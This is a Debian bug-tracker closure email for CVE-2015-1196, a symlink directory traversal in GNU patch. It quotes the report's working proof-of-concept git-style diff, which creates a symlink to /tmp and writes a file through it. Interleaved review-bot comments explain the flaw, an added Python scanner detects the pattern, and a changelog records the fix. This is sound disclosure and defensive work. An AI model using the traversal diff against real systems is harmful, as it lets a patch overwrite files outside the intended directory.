Your message dated Tue, 20 Jan 2015 21:18:53 +0000
with message-id <[email protected]>
and subject line Bug#775227: fixed in patch 2.7.1-7
has caused the Debian Bug report #775227,
regarding patch: CVE-2015-1196: directory traversal via symlinks
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)


-- 
775227: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=775227
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: patch
Version: 2.7.1-6
Tags: security

patch now supports git-style patches, which allow creating symlinks. This feature can be abused for directory traversal. As a proof of concept, applying the attached patch creates a file in /tmp:

$ ls /tmp/moo
/bin/ls: cannot access /tmp/moo: No such file or directory

$ mkdir empty && cd empty

$ patch -p1 < ~/traversal.diff
patching symbolic link tmp
patching file tmp/moo

$ ls /tmp/moo
/tmp/moo


-- System Information:
Debian Release: 8.0
 APT prefers unstable
 APT policy: (990, 'unstable'), (500, 'experimental')
Architecture: i386 (x86_64)
Foreign Architectures: amd64

Kernel: Linux 3.2.0-4-amd64 (SMP w/2 CPU cores)
Locale: LANG=C, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: sysvinit (via /sbin/init)

Versions of packages patch depends on:
ii  libc6  2.19-13

--
Jakub Wilk
diff --git a/tmp b/tmp
new file mode 120000
index 0000000..cad2309
--- /dev/null
+++ b/tmp
@@ -0,0 +1 @@
+/tmp
\ No newline at end of file
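Review bot: the `+/tmp` line gives this `120000` entry an absolute target, so the link created at `tmp` resolves outside the directory patch was run in; an applier that honours git-style symlink entries has to validate the target (reject absolute paths and `..` components that leave the working tree) before creating the link, which is the check the 2.7.1-6 build named in the report does not perform.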
diff --git a/tmp/moo b/tmp/moo
new file mode 100644
index 0000000..eec8c88
--- /dev/null
+++ b/tmp/moo
@@ -0,0 +1 @@
+moo
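Review bot: the path `tmp/moo` of this entry looks contained, but its first component is the symlink the previous entry created, so the write lands in `/tmp/moo`; checking the file path on its own is not enough, the applier must refuse to write through a symlink (at minimum one created earlier in the same patch), and entry order matters: the link has to precede the file for the traversal to work.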

--- End Message ---
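A pre-apply scanner for the pattern the report above demonstrates, as an added example that is not part of the bug report, the Debian package or GNU patch's own code. It walks the `diff --git` entries of a git-style diff in order, records the symlinks the patch would create (mode `120000`), and flags a symlink whose target resolves outside the working tree as well as any later entry whose path passes through a link the patch created. The `POC_DIFF` text is a constructed copy of the attached traversal.diff, `BENIGN_DIFF` is a constructed counter-example, and the names `scan_diff`, `escapes_tree` and `Finding` are this example's own.

```python
"""Pre-apply scanner for git-style diffs that flags symlink traversal.

Added example, not code from GNU patch, the Debian package or the bug
report. Entries are evaluated in patch order, because the PoC depends on
the link existing before the file behind it is written.
"""
import posixpath
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed copy of the traversal.diff attached to the report:
# a symlink `tmp -> /tmp`, then a file written through it.
POC_DIFF = """\
diff --git a/tmp b/tmp
new file mode 120000
index 0000000..cad2309
--- /dev/null
+++ b/tmp
@@ -0,0 +1 @@
+/tmp
\\ No newline at end of file
diff --git a/tmp/moo b/tmp/moo
new file mode 100644
index 0000000..eec8c88
--- /dev/null
+++ b/tmp/moo
@@ -0,0 +1 @@
+moo
"""

# Constructed benign diff: an in-tree relative symlink plus a normal file.
BENIGN_DIFF = """\
diff --git a/lib/current b/lib/current
new file mode 120000
--- /dev/null
+++ b/lib/current
@@ -0,0 +1 @@
+../lib/v2
\\ No newline at end of file
diff --git a/src/main.c b/src/main.c
new file mode 100644
--- /dev/null
+++ b/src/main.c
@@ -0,0 +1 @@
+int main(void) { return 0; }
"""

HEADER_RE = re.compile(r"^diff --git a/(\S+) b/(\S+)$")
MODE_RE = re.compile(r"^(?:new file|new|old) mode (\d{6})$")
SYMLINK_MODE = "120000"


@dataclass
class Finding:
    path: str
    reason: str


@dataclass
class _Entry:
    path: str
    symlink: bool = False
    target: Optional[str] = None  # first `+` hunk line of a symlink entry
    in_hunk: bool = False


def escapes_tree(path: str) -> bool:
    """True if a path interpreted relative to the working tree leaves it."""
    if posixpath.isabs(path):
        return True
    norm = posixpath.normpath(path)
    return norm == ".." or norm.startswith("../")


def _parse(diff_text: str) -> List[_Entry]:
    """Collect per-file entries; the b/ side is the path that gets written."""
    entries: List[_Entry] = []
    cur: Optional[_Entry] = None
    for line in diff_text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            cur = _Entry(path=m.group(2))
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = MODE_RE.match(line)
        if m:
            cur.symlink = cur.symlink or m.group(1) == SYMLINK_MODE
        elif line.startswith("@@"):
            cur.in_hunk = True
        elif cur.in_hunk and cur.symlink and cur.target is None and line.startswith("+"):
            cur.target = line[1:]  # a symlink's file content is its target
    return entries


def scan_diff(diff_text: str) -> List[Finding]:
    """Flag paths that escape the tree, links whose target escapes it, and
    writes that pass through a link this same patch creates earlier."""
    findings: List[Finding] = []
    created_links: Dict[str, str] = {}
    for e in _parse(diff_text):
        if escapes_tree(e.path):
            findings.append(Finding(e.path, "path escapes working tree"))
        parent = posixpath.dirname(e.path)
        while parent:  # does any parent component resolve to a created link?
            if parent in created_links:
                findings.append(Finding(
                    e.path, f"written through symlink {parent} -> {created_links[parent]}"))
                break
            parent = posixpath.dirname(parent)
        if e.symlink:
            target = e.target or ""
            if escapes_tree(posixpath.join(posixpath.dirname(e.path), target)):
                findings.append(Finding(e.path, f"symlink target {target!r} escapes working tree"))
            created_links[e.path] = target
    return findings


if __name__ == "__main__":
    for f in scan_diff(POC_DIFF):
        print(f"{f.path}: {f.reason}")
```

The scanner assumes git's `a/` and `b/` prefixes, i.e. the `-p1` invocation used in the report; other strip levels need the header regex adjusted. It also only knows about links the patch itself creates: a symlink already present in the target directory would need an `os.lstat` walk over each path's components before applying, which is deliberately left out here.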
--- Begin Message ---
Source: patch
Source-Version: 2.7.1-7

We believe that the bug you reported is fixed in the latest version of
patch, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Laszlo Boszormenyi (GCS) <[email protected]> (supplier of updated patch package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Tue, 20 Jan 2015 19:34:19 +0000
Source: patch
Binary: patch
Architecture: source amd64
Version: 2.7.1-7
Distribution: unstable
Urgency: high
Maintainer: Laszlo Boszormenyi (GCS) <[email protected]>
Changed-By: Laszlo Boszormenyi (GCS) <[email protected]>
Description:
 patch      - Apply a diff file to an original
Closes: 775227 775540 775793
Changes:
 patch (2.7.1-7) unstable; urgency=high
 .
   * Backport patches from upstream Git tree:
     - fix CVE-2015-1196: directory traversal via symlinks (closes: #775227),
     - infinite loop while applying patch (closes: #775540),
     - segmentation fault while applying corrupted patch (closes: #775793).
Checksums-Sha1:
 3ccd6e6153fe56cd6c8d8d9da65ac0f7b8364b96 1751 patch_2.7.1-7.dsc
 bbd77e7fdebd12348c9f91ee89946bbddd2756be 12448 patch_2.7.1-7.debian.tar.xz
 6947302639febb8e6ccc241a8cf96f969830ee89 97324 patch_2.7.1-7_amd64.deb
Checksums-Sha256:
 390dd7f91f6a1490fe20a5f773fd93e906648ca267dca82e42541e36a9bab417 1751 patch_2.7.1-7.dsc
 f644d8fc6b0e7d3a92fd51ea631f1454645192380f126a96ca89aa6f359a03de 12448 patch_2.7.1-7.debian.tar.xz
 0183b9f43e9912d177d81ecc094150d12a825d9cd927f0554df9683c39273626 97324 patch_2.7.1-7_amd64.deb
Files:
 fb67b05e757cfefacaacb4cc17f8c786 1751 vcs standard patch_2.7.1-7.dsc
 c1390b649f17fc4f4542fac704a49a01 12448 vcs standard patch_2.7.1-7.debian.tar.xz
 a4912dd0292de7c728200dc05061cd53 97324 vcs standard patch_2.7.1-7_amd64.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
-----END PGP SIGNATURE-----

--- End Message ---